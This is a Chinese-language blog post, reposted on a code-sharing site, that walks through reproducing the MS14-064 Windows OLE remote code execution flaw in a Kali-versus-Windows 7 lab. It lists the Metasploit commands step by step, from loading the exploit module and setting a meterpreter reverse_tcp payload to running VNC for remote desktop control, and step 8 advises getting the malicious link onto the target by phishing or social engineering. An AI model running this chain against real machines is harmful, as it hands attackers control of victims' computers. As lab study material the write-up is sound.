码迷,mamicode.com
首页 > 其他好文 > 详细

漏洞复现:MS14-064 OLE远程代码执行漏洞

时间:2019-09-23 11:40:00      阅读:240      评论:0      收藏:0      [点我收藏+]

标签:位置   linux   漏洞复现   srv   ima   bsp   com   完成   ret   


MS14-064OLE远程代码执行漏洞

攻击机:Kali Linux 2019

靶机:Windows 7 x64、x32

攻击步骤:

1.打开攻击机Kali Linux 2019系统和靶机Windows 7系统

技术图片

 

 2.确定IP地址后,Kali Linux开启msf模块,准备攻击测试

技术图片

 

 

3.在这里我们使用MS14-064OLE远程代码执行漏洞,开始搜索MS14-064

 

(search MS14-064)

 

技术图片

 

 4.我们利用use exploit/windows/browser/ms14_064_ole_code_execution  加载漏洞利用模块

use exploit/windows/browser/ms14_064_ole_code_execution

 

 

技术图片

 

 

5.查看详细配置,进行下一步的详细配置

技术图片

 

 6.开始配置payload,Payload下的LHOST地址和模块下的SRVHOST地址

(Payload:set payload windows/meterpreter/reverse_tcp)

(LHOST地址:Kali Linux IP地址)

(SRVHOST地址:Kali Linux IP地址)

技术图片

 

 7.注意一下上图这个箭头位置,要把其中的默认false熟悉改为true,因为msf中自带的漏洞是利用exp调用的是powershell,所以msf的exp代码只对安装了powershell的系统生效,这里我们来用windows 7 系统进行测试。

(命令:set ALlowPowershellPrompt true)

技术图片

 

 8.输入exploit 进行测试,会生成一个url链接,用钓鱼方法或者是社会工程学传到Win7主机里,就可以实现控制

技术图片

 

 技术图片

 

 技术图片

 

 技术图片

 

 9.提取到权限,渗透完成,可以进行远程桌面操控,观察操作桌面等

(run vnc 观察操作界面)

技术图片

 

 

漏洞复现:MS14-064 OLE远程代码执行漏洞

标签:位置   linux   漏洞复现   srv   ima   bsp   com   完成   ret   

原文地址:https://www.cnblogs.com/redHskb/p/11571396.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!